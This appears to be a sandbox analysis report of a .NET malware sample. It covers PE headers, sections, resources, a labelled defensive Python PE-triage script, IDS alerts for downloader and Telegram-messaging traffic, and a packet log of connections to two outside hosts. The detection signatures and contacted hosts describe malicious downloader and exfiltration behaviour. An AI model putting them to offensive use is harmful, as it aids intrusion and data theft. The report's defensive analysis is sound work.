                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
add byte ptr [eax], al   (repeated for the remaining 20 lines of the listing: the disassembler has run into zero-filled padding, and the byte pair 00 00 decodes as this instruction)
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb2d84 | 0x57 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb4000 | 0x171e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xc8400 | 0x2f40 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xcc000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Two entries matter for triage. IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR is non-zero (0x48 bytes at RVA 0x2008), so this is a managed .NET image: the CLR header is present and the only native import is mscoree.dll!_CorExeMain. IMAGE_DIRECTORY_ENTRY_SECURITY is also non-zero (0x2f40 bytes at 0xc8400); for this entry the value is a file offset rather than an RVA, which is why the section column is empty: the certificate blob lies outside the mapped sections. Its presence only says that a signature blob exists; whether it actually validates has to be checked separately, for example with Get-AuthenticodeSignature in PowerShell or signtool verify /pa.
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xb0de4 | 0xb0e00 | fdd0a855a02b8d74d42fbd62a5e936e6 | False | 0.5713159783568904 | DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 172405433391196340124651232428032.000000 | 6.762115344946815 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xb4000 | 0x171e0 | 0x17200 | 5deae21a568a2385b9b547572b6f6ff5 | False | 0.4616765202702703 | data | 5.447090938389051 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xcc000 | 0xc | 0x200 | 4c1e57cc09931424ddbaf77420e6c273 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

The "DIY-Thermocam raw data" file type reported for .text is a libmagic misidentification of arbitrary code bytes and carries no meaning. The .text entropy of 6.76 bits/byte is elevated for a section that should hold mostly CIL and metadata and is consistent with an embedded compressed or encrypted payload. The 12-byte .reloc is the single base relocation a .NET executable needs for its native entry stub.
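The two tables above are what a first PE triage reads off the headers. The following Python script is an added example, not code from the report or from Joe Sandbox, that parses the same structures and makes the checks explicit: whether a CLR header (COM_DESCRIPTOR) is present, whether the SECURITY entry points at a blob appended after the section data, and the Shannon entropy of each section. Because it has to run offline it builds its own minimal PE32 in memory (build_sample_pe) rather than reading the sample; that constructed image, its RVAs and the 7.0 bits/byte entropy cut-off are assumptions of the example, not values from the report.

```python
import math
import random
import struct

DIRECTORY_NAMES = [
    "EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC",
    "DEBUG", "COPYRIGHT", "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT",
    "IAT", "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED",
]
IDX_SECURITY, IDX_COM_DESCRIPTOR = 4, 14


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for an empty or constant buffer, 8.0 for a uniform byte distribution."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def parse_pe(data: bytes) -> dict:
    """Walk DOS header -> PE signature -> COFF/optional header -> data directories -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
    n_sections = struct.unpack_from("<H", data, coff + 2)[0]
    size_opt = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    # PE32 has 96 bytes before the directories, PE32+ 112 (8-byte ImageBase/stack/heap fields).
    pre_dirs = {0x10B: 96, 0x20B: 112}.get(magic)
    if pre_dirs is None:
        raise ValueError(f"unknown optional header magic 0x{magic:x}")
    dir_off = opt + pre_dirs
    n_dirs = struct.unpack_from("<I", data, dir_off - 4)[0]   # NumberOfRvaAndSizes
    dirs = {}
    for i in range(min(n_dirs, 16)):
        dirs[DIRECTORY_NAMES[i]] = struct.unpack_from("<II", data, dir_off + 8 * i)
    sections = []
    for i in range(n_sections):
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, opt + size_opt + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize,
                         "raw_ptr": raw_ptr, "raw_size": raw_size,
                         "entropy": shannon_entropy(data[raw_ptr:raw_ptr + raw_size])})
    return {"directories": dirs, "sections": sections}


def triage(data: bytes, entropy_threshold: float = 7.0) -> dict:
    """Checks a first look at the header tables asks for. The 7.0 cut-off is a common
    packer heuristic and an assumption of this example, not something the report states."""
    pe = parse_pe(data)
    sec_off, sec_size = pe["directories"].get("SECURITY", (0, 0))
    _, com_size = pe["directories"].get("COM_DESCRIPTOR", (0, 0))
    last_raw_end = max((s["raw_ptr"] + s["raw_size"] for s in pe["sections"]), default=0)
    return {
        "is_dotnet": com_size != 0,                 # CLR header present -> managed image
        "has_authenticode_blob": sec_size != 0,     # presence only; validity needs a verifier
        # SECURITY holds a file offset, not an RVA, so the blob is never inside a section.
        "signature_in_overlay": sec_size != 0 and sec_off >= last_raw_end,
        "high_entropy_sections": [s["name"] for s in pe["sections"] if s["entropy"] >= entropy_threshold],
        "section_entropy": {s["name"]: round(s["entropy"], 3) for s in pe["sections"]},
    }


def build_sample_pe(seed: int = 1) -> bytes:
    """Constructed minimal PE32 (not the report's sample): one executable .text section of
    pseudo-random bytes, a CLR directory at RVA 0x2008, and a 64-byte placeholder blob
    appended after the section data that the SECURITY directory points at."""
    rng = random.Random(seed)
    text = bytes(rng.getrandbits(8) for _ in range(0x1000))
    headers_size, text_ptr = 0x200, 0x200
    sig_ptr, sig = text_ptr + len(text), bytes(64)
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                              # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 96 + 16 * 8, 0x0102)
    opt = bytearray(96)
    struct.pack_into("<H", opt, 0, 0x10B)                              # PE32 magic
    struct.pack_into("<I", opt, 16, 0x2000)                            # AddressOfEntryPoint
    struct.pack_into("<III", opt, 28, 0x400000, 0x1000, 0x200)         # ImageBase, SectionAlign, FileAlign
    struct.pack_into("<II", opt, 56, 0x4000, headers_size)             # SizeOfImage, SizeOfHeaders
    struct.pack_into("<H", opt, 68, 3)                                 # IMAGE_SUBSYSTEM_WINDOWS_CUI
    struct.pack_into("<I", opt, 92, 16)                                # NumberOfRvaAndSizes
    dirs = [(0, 0)] * 16
    dirs[IDX_SECURITY] = (sig_ptr, len(sig))
    dirs[IDX_COM_DESCRIPTOR] = (0x2008, 0x48)
    dir_bytes = b"".join(struct.pack("<II", *d) for d in dirs)
    section = struct.pack("<8sIIIIIIHHI", b".text", len(text), 0x2000, len(text), text_ptr,
                          0, 0, 0, 0, 0x60000020)                      # CODE | EXECUTE | READ
    headers = dos + b"PE\0\0" + coff + opt + dir_bytes + section
    return bytes(headers) + bytes(headers_size - len(headers)) + text + sig


if __name__ == "__main__":
    for key, value in triage(build_sample_pe()).items():
        print(f"{key}: {value}")
```

To run it against a real file, replace build_sample_pe() with the bytes read from disk; the parser only needs the headers and the section raw data, so it works on the unmapped on-disk image.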
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xb4418 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | | | 0.5815602836879432
RT_ICON | 0xb4880 | 0x1128 | Device independent bitmap graphic, 32 x 64 x 32, image size 4352 | | | 0.3599726775956284
RT_ICON | 0xb59a8 | 0x2668 | Device independent bitmap graphic, 48 x 96 x 32, image size 9792 | | | 0.2635272579332791
RT_ICON | 0xb8010 | 0x4428 | Device independent bitmap graphic, 64 x 128 x 32, image size 17408 | | | 0.2042067858780376
RT_ICON | 0xbc438 | 0x5dbb | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9954573869556158
RT_ICON | 0xc21f4 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | | | 0.5815602836879432
RT_ICON | 0xc265c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | | | 0.5948581560283688
RT_ICON | 0xc2ac4 | 0x9b8 | Device independent bitmap graphic, 24 x 48 x 32, image size 2448 | | | 0.4204180064308682
RT_ICON | 0xc347c | 0x1128 | Device independent bitmap graphic, 32 x 64 x 32, image size 4352 | | | 0.32308743169398907
RT_ICON | 0xc45a4 | 0x1128 | Device independent bitmap graphic, 32 x 64 x 32, image size 4352 | | | 0.14412568306010928
RT_ICON | 0xc56cc | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | | | 0.19060283687943264
RT_ICON | 0xc5b34 | 0x1128 | Device independent bitmap graphic, 32 x 64 x 32, image size 4352 | | | 0.11429872495446267
RT_ICON | 0xc6c5c | 0x2668 | Device independent bitmap graphic, 48 x 96 x 32, image size 9792 | | | 0.07211147274206672
RT_ICON | 0xc92c4 | 0x1952 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.7099660598580685
RT_GROUP_ICON | 0xcac18 | 0x3e | data | | | 0.8709677419354839
RT_GROUP_ICON | 0xcac58 | 0x4c | data | | | 0.8289473684210527
RT_GROUP_ICON | 0xcaca4 | 0x14 | data | | | 1.25
RT_GROUP_ICON | 0xcacb8 | 0x30 | data | | | 0.9583333333333334
RT_GROUP_ICON | 0xcace8 | 0x14 | data | | | 1.2
RT_VERSION | 0xcacfc | 0x4e4 | data | English | United States | 0.4169329073482428

The ZLIB complexity close to 1.0 on the two PNG icons reflects PNG's own deflate compression, not packed data; the resource directory here holds only icons and a version block, so any embedded payload must be looked for in .text rather than .rsrc.
DLL | Import
mscoree.dll | _CorExeMain

Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-11T06:49:54.998464+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49974 | 158.101.44.242 | 80 | TCP
2025-01-11T06:49:56.108675+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49974 | 158.101.44.242 | 80 | TCP
2025-01-11T06:49:56.699912+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49976 | 104.21.64.1 | 443 | TCP
2025-01-11T06:49:57.373425+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49978 | 158.101.44.242 | 80 | TCP
2025-01-11T06:49:58.560996+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49980 | 158.101.44.242 | 80 | TCP
2025-01-11T06:50:00.340945+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49983 | 104.21.64.1 | 443 | TCP
2025-01-11T06:50:24.253611+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49987 | 104.21.64.1 | 443 | TCP
2025-01-11T06:50:32.505128+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49991 | 104.21.64.1 | 443 | TCP
2025-01-11T06:50:33.465505+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.7 | 49992 | 149.154.167.220 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2025 06:49:54.199107885 CET | 49974 | 80 | 192.168.2.7 | 158.101.44.242
Jan 11, 2025 06:49:54.204050064 CET | 80 | 49974 | 158.101.44.242 | 192.168.2.7
Jan 11, 2025 06:49:54.204138994 CET | 49974 | 80 | 192.168.2.7 | 158.101.44.242
Jan 11, 2025 06:49:54.205626011 CET | 49974 | 80 | 192.168.2.7 | 158.101.44.242
Jan 11, 2025 06:49:54.210403919 CET | 80 | 49974 | 158.101.44.242 | 192.168.2.7
Jan 11, 2025 06:49:54.782908916 CET | 80 | 49974 | 158.101.44.242 | 192.168.2.7
Jan 11, 2025 06:49:54.787698984 CET | 49974 | 80 | 192.168.2.7 | 158.101.44.242
Jan 11, 2025 06:49:54.792571068 CET | 80 | 49974 | 158.101.44.242 | 192.168.2.7
Jan 11, 2025 06:49:54.945127010 CET | 80 | 49974 | 158.101.44.242 | 192.168.2.7
Jan 11, 2025 06:49:54.995460033 CET | 49975 | 443 | 192.168.2.7 | 104.21.64.1
Jan 11, 2025 06:49:54.995564938 CET | 443 | 49975 | 104.21.64.1 | 192.168.2.7
Jan 11, 2025 06:49:54.995656967 CET | 49975 | 443 | 192.168.2.7 | 104.21.64.1
Jan 11, 2025 06:49:54.998464108 CET | 49974 | 80 | 192.168.2.7 | 158.101.44.242
Jan 11, 2025 06:49:55.096153975 CET | 49975 | 443 | 192.168.2.7 | 104.21.64.1
Jan 11, 2025 06:49:55.096191883 CET | 443 | 49975 | 104.21.64.1 | 192.168.2.7
Jan 11, 2025 06:49:55.568866968 CET | 443 | 49975 | 104.21.64.1 | 192.168.2.7
Jan 11, 2025 06:49:55.569150925 CET | 49975 | 443 | 192.168.2.7 | 104.21.64.1
Jan 11, 2025 06:49:55.636881113 CET | 49975 | 443 | 192.168.2.7 | 104.21.64.1
Jan 11, 2025 06:49:55.636924028 CET | 443 | 49975 | 104.21.64.1 | 192.168.2.7
Jan 11, 2025 06:49:55.638046980 CET | 443 | 49975 | 104.21.64.1 | 192.168.2.7
Jan 11, 2025 06:49:55.678189993 CET | 49975 | 443 | 192.168.2.7 | 104.21.64.1
Jan 11, 2025 06:49:55.771220922 CET | 49975 | 443 | 192.168.2.7 | 104.21.64.1
Jan 11, 2025 06:49:55.811342955 CET | 443 | 49975 | 104.21.64.1 | 192.168.2.7
Jan 11, 2025 06:49:55.879914999 CET | 443 | 49975 | 104.21.64.1 | 192.168.2.7
Jan 11, 2025 06:49:55.879976034 CET | 443 | 49975 | 104.21.64.1 | 192.168.2.7
Jan 11, 2025 06:49:55.880152941 CET | 49975 | 443 | 192.168.2.7 | 104.21.64.1
Jan 11, 2025 06:49:55.887653112 CET | 49975 | 443 | 192.168.2.7 | 104.21.64.1
Jan 11, 2025 06:49:55.891335011 CET | 49974 | 80 | 192.168.2.7 | 158.101.44.242
Jan 11, 2025 06:49:55.896234989 CET | 80 | 49974 | 158.101.44.242 | 192.168.2.7
Jan 11, 2025 06:49:56.049045086 CET | 80 | 49974 | 158.101.44.242 | 192.168.2.7
Jan 11, 2025 06:49:56.067315102 CET | 49976 | 443 | 192.168.2.7 | 104.21.64.1
Jan 11, 2025 06:49:56.067369938 CET | 443 | 49976 | 104.21.64.1 | 192.168.2.7
Jan 11, 2025 06:49:56.067456007 CET | 49976 | 443 | 192.168.2.7 | 104.21.64.1
Jan 11, 2025 06:49:56.067799091 CET | 49976 | 443 | 192.168.2.7 | 104.21.64.1
Jan 11, 2025 06:49:56.067835093 CET | 443 | 49976 | 104.21.64.1 | 192.168.2.7
Jan 11, 2025 06:49:56.108675003 CET | 49974 | 80 | 192.168.2.7 | 158.101.44.242
Jan 11, 2025 06:49:56.549272060 CET | 443 | 49976 | 104.21.64.1 | 192.168.2.7
Jan 11, 2025 06:49:56.551676989 CET | 49976 | 443 | 192.168.2.7 | 104.21.64.1
Jan 11, 2025 06:49:56.551762104 CET | 443 | 49976 | 104.21.64.1 | 192.168.2.7
Jan 11, 2025 06:49:56.699934006 CET | 443 | 49976 | 104.21.64.1 | 192.168.2.7
Jan 11, 2025 06:49:56.700001955 CET | 443 | 49976 | 104.21.64.1 | 192.168.2.7
Jan 11, 2025 06:49:56.700058937 CET | 49976 | 443 | 192.168.2.7 | 104.21.64.1
Jan 11, 2025 06:49:56.700478077 CET | 49976 | 443 | 192.168.2.7 | 104.21.64.1
Jan 11, 2025 06:49:56.704144955 CET | 49974 | 80 | 192.168.2.7 | 158.101.44.242
Jan 11, 2025 06:49:56.705507040 CET | 49978 | 80 | 192.168.2.7 | 158.101.44.242
Jan 11, 2025 06:49:56.709091902 CET | 80 | 49974 | 158.101.44.242 | 192.168.2.7
Jan 11, 2025 06:49:56.709156990 CET | 49974 | 80 | 192.168.2.7 | 158.101.44.242
Jan 11, 2025 06:49:56.710319996 CET | 80 | 49978 | 158.101.44.242 | 192.168.2.7
Jan 11, 2025 06:49:56.710397005 CET | 49978 | 80 | 192.168.2.7 | 158.101.44.242
Jan 11, 2025 06:49:56.710499048 CET | 49978 | 80 | 192.168.2.7 | 158.101.44.242
Jan 11, 2025 06:49:56.715250969 CET | 80 | 49978 | 158.101.44.242 | 192.168.2.7
Jan 11, 2025 06:49:57.322055101 CET | 80 | 49978 | 158.101.44.242 | 192.168.2.7
Jan 11, 2025 06:49:57.323563099 CET | 49979 | 443 | 192.168.2.7 | 104.21.64.1
Jan 11, 2025 06:49:57.323618889 CET | 443 | 49979 | 104.21.64.1 | 192.168.2.7
Jan 11, 2025 06:49:57.323697090 CET | 49979 | 443 | 192.168.2.7 | 104.21.64.1
Jan 11, 2025 06:49:57.324034929 CET | 49979 | 443 | 192.168.2.7 | 104.21.64.1
Jan 11, 2025 06:49:57.324048996 CET | 443 | 49979 | 104.21.64.1 | 192.168.2.7
Jan 11, 2025 06:49:57.373425007 CET | 49978 | 80 | 192.168.2.7 | 158.101.44.242
Jan 11, 2025 06:49:57.786822081 CET | 443 | 49979 | 104.21.64.1 | 192.168.2.7
Jan 11, 2025 06:49:57.788521051 CET | 49979 | 443 | 192.168.2.7 | 104.21.64.1
Jan 11, 2025 06:49:57.788554907 CET | 443 | 49979 | 104.21.64.1 | 192.168.2.7
Jan 11, 2025 06:49:57.919061899 CET | 443 | 49979 | 104.21.64.1 | 192.168.2.7
Jan 11, 2025 06:49:57.919142008 CET | 443 | 49979 | 104.21.64.1 | 192.168.2.7
Jan 11, 2025 06:49:57.919279099 CET | 49979 | 443 | 192.168.2.7 | 104.21.64.1
Jan 11, 2025 06:49:57.919960976 CET | 49979 | 443 | 192.168.2.7 | 104.21.64.1
Jan 11, 2025 06:49:57.923274994 CET | 49978 | 80 | 192.168.2.7 | 158.101.44.242
Jan 11, 2025 06:49:57.924391985 CET | 49980 | 80 | 192.168.2.7 | 158.101.44.242
Jan 11, 2025 06:49:57.928301096 CET | 80 | 49978 | 158.101.44.242 | 192.168.2.7
Jan 11, 2025 06:49:57.929272890 CET | 80 | 49980 | 158.101.44.242 | 192.168.2.7
Jan 11, 2025 06:49:57.929361105 CET | 49978 | 80 | 192.168.2.7 | 158.101.44.242
Jan 11, 2025 06:49:57.929399967 CET | 49980 | 80 | 192.168.2.7 | 158.101.44.242
Jan 11, 2025 06:49:57.929539919 CET | 49980 | 80 | 192.168.2.7 | 158.101.44.242
Jan 11, 2025 06:49:57.934271097 CET | 80 | 49980 | 158.101.44.242 | 192.168.2.7
Jan 11, 2025 06:49:58.510333061 CET | 80 | 49980 | 158.101.44.242 | 192.168.2.7
Jan 11, 2025 06:49:58.511558056 CET | 49981 | 443 | 192.168.2.7 | 104.21.64.1
Jan 11, 2025 06:49:58.511607885 CET | 443 | 49981 | 104.21.64.1 | 192.168.2.7
Jan 11, 2025 06:49:58.511672974 CET | 49981 | 443 | 192.168.2.7 | 104.21.64.1
Jan 11, 2025 06:49:58.511926889 CET | 49981 | 443 | 192.168.2.7 | 104.21.64.1
Jan 11, 2025 06:49:58.511936903 CET | 443 | 49981 | 104.21.64.1 | 192.168.2.7
Jan 11, 2025 06:49:58.560996056 CET | 49980 | 80 | 192.168.2.7 | 158.101.44.242
Jan 11, 2025 06:49:58.965941906 CET | 443 | 49981 | 104.21.64.1 | 192.168.2.7
Jan 11, 2025 06:49:58.967843056 CET | 49981 | 443 | 192.168.2.7 | 104.21.64.1
Jan 11, 2025 06:49:58.967889071 CET | 443 | 49981 | 104.21.64.1 | 192.168.2.7
Jan 11, 2025 06:49:59.121654034 CET | 443 | 49981 | 104.21.64.1 | 192.168.2.7
Jan 11, 2025 06:49:59.121722937 CET | 443 | 49981 | 104.21.64.1 | 192.168.2.7
Jan 11, 2025 06:49:59.121794939 CET | 49981 | 443 | 192.168.2.7 | 104.21.64.1
Jan 11, 2025 06:49:59.122303009 CET | 49981 | 443 | 192.168.2.7 | 104.21.64.1
Jan 11, 2025 06:49:59.126741886 CET | 49982 | 80 | 192.168.2.7 | 158.101.44.242
Jan 11, 2025 06:49:59.131690979 CET | 80 | 49982 | 158.101.44.242 | 192.168.2.7
Jan 11, 2025 06:49:59.131815910 CET | 49982 | 80 | 192.168.2.7 | 158.101.44.242
Jan 11, 2025 06:49:59.131913900 CET | 49982 | 80 | 192.168.2.7 | 158.101.44.242
Jan 11, 2025 06:49:59.136781931 CET | 80 | 49982 | 158.101.44.242 | 192.168.2.7
Jan 11, 2025 06:49:59.696301937 CET | 80 | 49982 | 158.101.44.242 | 192.168.2.7
Jan 11, 2025 06:49:59.697488070 CET | 49983 | 443 | 192.168.2.7 | 104.21.64.1
Jan 11, 2025 06:49:59.697556973 CET | 443 | 49983 | 104.21.64.1 | 192.168.2.7
Jan 11, 2025 06:49:59.697617054 CET | 49983 | 443 | 192.168.2.7 | 104.21.64.1
Jan 11, 2025 06:49:59.697952986 CET | 49983 | 443 | 192.168.2.7 | 104.21.64.1
Jan 11, 2025 06:49:59.697962999 CET | 443 | 49983 | 104.21.64.1 | 192.168.2.7
Jan 11, 2025 06:49:59.748461962 CET | 49982 | 80 | 192.168.2.7 | 158.101.44.242
Jan 11, 2025 06:50:00.182477951 CET | 443 | 49983 | 104.21.64.1 | 192.168.2.7
Jan 11, 2025 06:50:00.184051037 CET | 49983 | 443 | 192.168.2.7 | 104.21.64.1
Jan 11, 2025 06:50:00.184077978 CET | 443 | 49983 | 104.21.64.1 | 192.168.2.7
Jan 11, 2025 06:50:00.341037035 CET | 443 | 49983 | 104.21.64.1 | 192.168.2.7
Jan 11, 2025 06:50:00.341196060 CET | 443 | 49983 | 104.21.64.1 | 192.168.2.7
Jan 11, 2025 06:50:00.341368914 CET | 49983 | 443 | 192.168.2.7 | 104.21.64.1
Jan 11, 2025 06:50:00.341631889 CET | 49983 | 443 | 192.168.2.7 | 104.21.64.1
Jan 11, 2025 06:50:00.344856024 CET | 49982 | 80 | 192.168.2.7 | 158.101.44.242
Jan 11, 2025 06:50:00.346064091 CET | 49984 | 80 | 192.168.2.7 | 158.101.44.242
Jan 11, 2025 06:50:00.349998951 CET | 80 | 49982 | 158.101.44.242 | 192.168.2.7
Jan 11, 2025 06:50:00.350071907 CET | 49982 | 80 | 192.168.2.7 | 158.101.44.242
Jan 11, 2025 06:50:00.350955963 CET | 80 | 49984 | 158.101.44.242 | 192.168.2.7
Jan 11, 2025 06:50:00.351027012 CET | 49984 | 80 | 192.168.2.7 | 158.101.44.242
Jan 11, 2025 06:50:00.351129055 CET | 49984 | 80 | 192.168.2.7 | 158.101.44.242
Jan 11, 2025 06:50:00.355923891 CET | 80 | 49984 | 158.101.44.242 | 192.168.2.7
Jan 11, 2025 06:50:06.095999956 CET | 80 | 49984 | 158.101.44.242 | 192.168.2.7
Jan 11, 2025 06:50:06.097882032 CET | 49985 | 443 | 192.168.2.7 | 104.21.64.1
Jan 11, 2025 06:50:06.097934008 CET | 443 | 49985 | 104.21.64.1 | 192.168.2.7
Jan 11, 2025 06:50:06.098037958 CET | 49985 | 443 | 192.168.2.7 | 104.21.64.1
Jan 11, 2025 06:50:06.098386049 CET | 49985 | 443 | 192.168.2.7 | 104.21.64.1
Jan 11, 2025 06:50:06.098411083 CET | 443 | 49985 | 104.21.64.1 | 192.168.2.7
Jan 11, 2025 06:50:06.139143944 CET | 49984 | 80 | 192.168.2.7 | 158.101.44.242
Jan 11, 2025 06:50:06.575762033 CET | 443 | 49985 | 104.21.64.1 | 192.168.2.7
Jan 11, 2025 06:50:06.577444077 CET | 49985 | 443 | 192.168.2.7 | 104.21.64.1
Jan 11, 2025 06:50:06.577465057 CET | 443 | 49985 | 104.21.64.1 | 192.168.2.7
Jan 11, 2025 06:50:06.702199936 CET | 443 | 49985 | 104.21.64.1 | 192.168.2.7
Jan 11, 2025 06:50:06.702287912 CET | 443 | 49985 | 104.21.64.1 | 192.168.2.7
Jan 11, 2025 06:50:06.702385902 CET | 49985 | 443 | 192.168.2.7 | 104.21.64.1
Jan 11, 2025 06:50:06.702819109 CET | 49985 | 443 | 192.168.2.7 | 104.21.64.1
Jan 11, 2025 06:50:06.706403017 CET | 49984 | 80 | 192.168.2.7 | 158.101.44.242
Jan 11, 2025 06:50:06.707181931 CET | 49986 | 80 | 192.168.2.7 | 158.101.44.242
Jan 11, 2025 06:50:06.711625099 CET | 80 | 49984 | 158.101.44.242 | 192.168.2.7
                                                                                                            Jan 11, 2025 06:50:06.711711884 CET4998480192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:06.712029934 CET8049986158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:50:06.712110043 CET4998680192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:06.712234974 CET4998680192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:06.717068911 CET8049986158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:50:23.606889009 CET8049986158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:50:23.622778893 CET49987443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:23.622834921 CET44349987104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:23.623037100 CET49987443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:23.623332977 CET49987443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:23.623343945 CET44349987104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:23.654833078 CET4998680192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:24.079447031 CET44349987104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:24.123502016 CET49987443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:24.142951012 CET49987443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:24.142966986 CET44349987104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:24.253669977 CET44349987104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:24.253830910 CET44349987104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:24.253956079 CET49987443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:24.304521084 CET49987443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:24.355927944 CET4998680192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:24.361183882 CET8049986158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:50:24.361249924 CET4998680192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:24.361951113 CET4998880192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:24.366887093 CET8049988158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:50:24.366959095 CET4998880192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:24.367142916 CET4998880192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:24.371963978 CET8049988158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:50:28.448599100 CET8049988158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:50:28.453113079 CET49989443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:28.453177929 CET44349989104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:28.453339100 CET49989443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:28.453819036 CET49989443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:28.453833103 CET44349989104.21.64.1192.168.2.7
